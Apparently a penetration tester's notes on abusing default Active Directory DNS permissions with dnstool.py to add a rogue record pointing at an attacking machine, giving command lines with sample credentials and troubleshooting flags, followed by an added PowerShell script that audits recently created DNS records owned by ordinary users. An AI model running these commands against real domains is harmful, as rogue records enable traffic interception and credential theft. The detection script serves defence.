dnstool.py

This script adds DNS records to the domain's Active Directory-integrated DNS zones, which members of Domain Users can do by default.

Add a rogue DNS record that points to your attacking box:

dnstool.py -u 'tangent\any-valid-AD-user' -p 'Supersecretpassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER

Troubleshooting

If you get an error like this:

[!] LDAP operation failed. Message returned from server: noSuchObject 0000208D: NameErr: DSID-0310023C, problem 2001 (NO_OBJECT), data 0, best match of:
        'CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com'

Then rerun the command with the --legacy flag added.

Another time even the --legacy flag wouldn't save me. So I ran:

dnstool.py -u 'domain.com\brian' -p 'JingleAllTheWay1996!' --print-zones 10.7.7.7

The output could look something like this:

[-] Found 6 forest DNS zones:
    ..TrustAnchors
    x.x.x.in-addr.arpa
    x.x.x.in-addr.arpa
    x.x.x.in-addr.arpa
    au.domain.com
CNF:xxx-xxx-xxx-xxx
    domain.com

If you see domain.com in this output, try running dnstool.py again but with the --forest flag:

dnstool.py -u 'domain.com\brian' -p 'JingleAllTheWay1996!' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER --forest

If all else fails: I had a test recently where the tool was throwing errors having to do with LDAP/SSL, and long story short, it was easier to add the record on the Windows side with Powermad.
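
For the defending side, the three places these records can land (the default DomainDnsZones partition, the System container that --legacy targets, and the ForestDnsZones partition that --forest targets) can be audited for recently created records owned by ordinary accounts. The script below is an added example, not part of the original notes or of dnstool.py; it assumes the RSAT ActiveDirectory module, and the 30-day window and the owner allowlist are assumptions to adjust per environment.

```powershell
# Added example: list recently created dnsNode objects and who owns them.
Import-Module ActiveDirectory

$rootDse  = Get-ADRootDSE
$domainDN = $rootDse.defaultNamingContext
$forestDN = $rootDse.rootDomainNamingContext

# The three AD-integrated DNS storage locations, labelled with the matching dnstool.py mode.
$locations = [ordered]@{
    'DomainDnsZones (default)'    = "CN=MicrosoftDNS,DC=DomainDnsZones,$domainDN"
    'System container (--legacy)' = "CN=MicrosoftDNS,CN=System,$domainDN"
    'ForestDnsZones (--forest)'   = "CN=MicrosoftDNS,DC=ForestDnsZones,$forestDN"
}

$since = (Get-Date).AddDays(-30)   # assumption: review window

# Assumption: owners considered expected. Computer accounts (name ends in $) own
# dynamically registered records; admin groups and SYSTEM own static ones.
$expectedOwner = '\\(Domain|Enterprise) Admins$|^BUILTIN\\Administrators$|^NT AUTHORITY\\SYSTEM$|\$$'

$report = foreach ($loc in $locations.GetEnumerator()) {
    try {
        Get-ADObject -SearchBase $loc.Value -SearchScope Subtree `
                     -LDAPFilter '(objectClass=dnsNode)' `
                     -Properties whenCreated, nTSecurityDescriptor -ErrorAction Stop |
            Where-Object { $_.whenCreated -ge $since } |
            ForEach-Object {
                [pscustomobject]@{
                    Location = $loc.Key
                    # DN looks like DC=<record>,DC=<zone>,CN=MicrosoftDNS,...
                    Zone     = (($_.DistinguishedName -split ',')[1]) -replace '^DC=', ''
                    Record   = $_.Name
                    Created  = $_.whenCreated
                    Owner    = $_.nTSecurityDescriptor.Owner
                }
            }
    }
    catch {
        # A location may not exist (for example, no legacy zones in the System container).
        Write-Warning "Skipping $($loc.Key): $($_.Exception.Message)"
    }
}

# Records owned by a regular user account are the ones to review.
$report |
    Where-Object { $_.Owner -notmatch $expectedOwner } |
    Sort-Object Created -Descending |
    Format-Table -AutoSize
```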